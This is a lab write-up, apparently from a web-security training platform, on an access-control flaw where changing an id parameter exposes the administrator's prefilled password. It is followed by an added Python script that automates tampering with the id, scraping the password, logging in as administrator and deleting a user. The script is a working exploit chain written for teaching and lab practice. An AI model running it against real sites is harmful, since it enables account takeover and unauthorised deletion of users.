User ID controlled by request parameter with password disclosure

This lab has a user account page that contains the current user's existing password, prefilled in a masked input.

After logging in as "wiener," I observed that my account was linked to an ID in the URL:

https://0a1900cc04e26758802e8fea00510024.web-security-academy.net/my-account?id=wiener

Subsequently, I effortlessly modified the ID to "administrator," gaining access to the administrator's account page. A quick inspection of the page's source code revealed the administrator's password. With these newfound credentials, I logged in and successfully deleted the "carlos" user, ultimately resolving the lab.
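The same chain, scripted end to end as an added example (this is not code from the write-up or from the lab). Only the lab host and the `/my-account?id=` endpoint come from the page; the `/login` form and its `username`, `password` and optional hidden `csrf` fields, wiener's password `peter`, the exact attributes of the masked input, and the admin delete path are assumptions to adjust against the live lab.

```python
import html
import re
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# Lab host from the write-up; every lab instance gets its own subdomain.
LAB = "https://0a1900cc04e26758802e8fea00510024.web-security-academy.net"

# Crude tag/attribute scanner: enough for the lab's small HTML and dependency-free.
# Attribute order and quoting style are not assumed.
INPUT_RE = re.compile(r"<input\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(tag: str) -> dict:
    """Map attribute names (lower-cased) to unescaped values for one <input> tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = html.unescape(m.group(2) or m.group(3) or m.group(4) or "")
    return attrs


def find_input_value(page: str, name: str):
    """Value of the first <input name=...> with the given name, or None."""
    for tag in INPUT_RE.findall(page):
        attrs = parse_attrs(tag)
        if attrs.get("name") == name:
            return attrs.get("value")
    return None


def extract_prefilled_password(page: str):
    """The disclosed secret: the value prefilled into the masked (type=password) input."""
    for tag in INPUT_RE.findall(page):
        attrs = parse_attrs(tag)
        if attrs.get("type", "").lower() == "password" and attrs.get("value"):
            return attrs["value"]
    return None


class LabSession:
    """One cookie jar per identity, so wiener's and administrator's sessions stay apart."""

    def __init__(self, base: str = LAB):
        self.base = base
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(CookieJar()))

    def get(self, path: str) -> str:
        return self.opener.open(self.base + path).read().decode()

    def post(self, path: str, data: dict) -> str:
        body = urllib.parse.urlencode(data).encode()
        return self.opener.open(self.base + path, data=body).read().decode()

    def login(self, username: str, password: str) -> None:
        # Assumed: the login form lives at /login and posts username/password;
        # if it carries a hidden csrf field, echo it back.
        form = {"username": username, "password": password}
        csrf = find_input_value(self.get("/login"), "csrf")
        if csrf:
            form["csrf"] = csrf
        self.post("/login", form)

    def account_page(self, user_id: str) -> str:
        # The vulnerable endpoint: the server selects the account from the id
        # parameter instead of from the authenticated session.
        return self.get("/my-account?id=" + urllib.parse.quote(user_id))


def solve(base: str = LAB) -> str:
    """Run the full chain and return the leaked administrator password."""
    wiener = LabSession(base)
    wiener.login("wiener", "peter")  # assumed: the lab's standard low-privilege credentials
    leaked = extract_prefilled_password(wiener.account_page("administrator"))
    if leaked is None:
        raise RuntimeError("no prefilled password on the administrator account page")
    admin = LabSession(base)
    admin.login("administrator", leaked)
    # Assumed: the admin panel's delete action path; adjust to what the panel links to.
    admin.get("/admin/delete?username=" + urllib.parse.quote("carlos"))
    return leaked


if __name__ == "__main__":
    print("administrator password:", solve())
```

Two separate defects make this work, and a fix needs to address both: the account page is selected by a client-controlled `id` rather than by the identity bound to the session cookie, and the page echoes the stored password back into the form at all. Masking the input only hides the value from the screen, not from the response body.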
